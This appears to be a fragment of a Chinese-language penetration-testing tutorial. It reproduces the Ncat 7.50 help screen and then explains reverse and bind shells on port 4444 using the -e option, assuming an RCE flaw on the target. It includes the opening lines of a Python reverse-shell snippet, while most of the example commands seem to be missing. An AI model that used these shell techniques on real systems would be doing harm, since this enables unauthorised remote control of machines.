
Ncat 7.50 ( )
Usage: ncat [options] [hostname] [port] Options taking a time assume seconds. Append 'ms' for milliseconds,
's' for seconds, 'm' for minutes, or 'h' for hours (e.g. 500ms).
- Use IPv4 only
- Use IPv6 only
-U, --unixsock Use Unix domain sockets only
-C, --crlf Use CRLF for EOL sequence
-c, --sh-exec <command> Executes the given command via /bin/sh
-e, --exec <command> Executes the given command
--lua-exec <filename> Executes the given Lua script
-g hop1[,hop2,...] Loose source routing hop points ( max)
-G <n> Loose source routing hop pointer (, , , ...)
-m, --max-conns <n> Maximum <n> simultaneous connections
-h, --help Display this help screen
-d, --delay <time> Wait between read/writes
-o, --output <filename> Dump session data to a file
-x, --hex-dump <filename> Dump session data as hex to a file
-i, --idle-timeout <time> Idle read/write timeout
-p, --source-port port Specify source port to use
-s, --source addr Specify source address to use (doesn't affect -l)
-l, --listen Bind and listen for incoming connections
-k, --keep-open Accept multiple connections in listen mode
-n, --nodns Do not resolve hostnames via DNS
-t, --telnet Answer Telnet negotiations
-u, --udp Use UDP instead of default TCP
--sctp Use SCTP instead of default TCP
-v, --verbose Set verbosity level (can be used several times)
-w, --wait <time> Connect timeout
-z Zero-I/O mode, report connection status only
--append-output Append rather than clobber specified output files
--send-only Only send data, ignoring received; quit on EOF
--recv-only Only receive data, never send anything
--allow Allow only given hosts to connect to Ncat
--allowfile A file of hosts allowed to connect to Ncat
--deny Deny given hosts from connecting to Ncat
--denyfile A file of hosts denied from connecting to Ncat
--broker Enable Ncat's connection brokering mode
--chat Start a simple Ncat chat server
--proxy <addr[:port]> Specify address of host to proxy through
--proxy-type <type> Specify proxy type ("http" or "socks4" or "socks5")
--proxy-auth <auth> Authenticate with HTTP or SOCKS proxy server
--ssl Connect or listen with SSL
--ssl-cert Specify SSL certificate file (PEM) for listening
--ssl-key Specify SSL private key (PEM) for listening
--ssl-verify Verify trust and domain name of certificates
--ssl-trustfile PEM file containing trusted SSL certificates
--ssl-ciphers Cipherlist containing SSL ciphers to use
--version Display Ncat's version information and exit See the ncat() manpage for full options, descriptions and usage examples


在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。








import os,socket,subprocess;
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


在该图中,目标使用Netcat侦听器将Bash shell绑定到它特定端口4444。攻击者使用简单的Netcat命令连接到此端口。设置bind shell的步骤如下:

使用Netcat将一个bash shell绑定到4444端口。 从攻击主机连接到端口4444上的目标主机。 从攻击主机发出命令到目标主机上。

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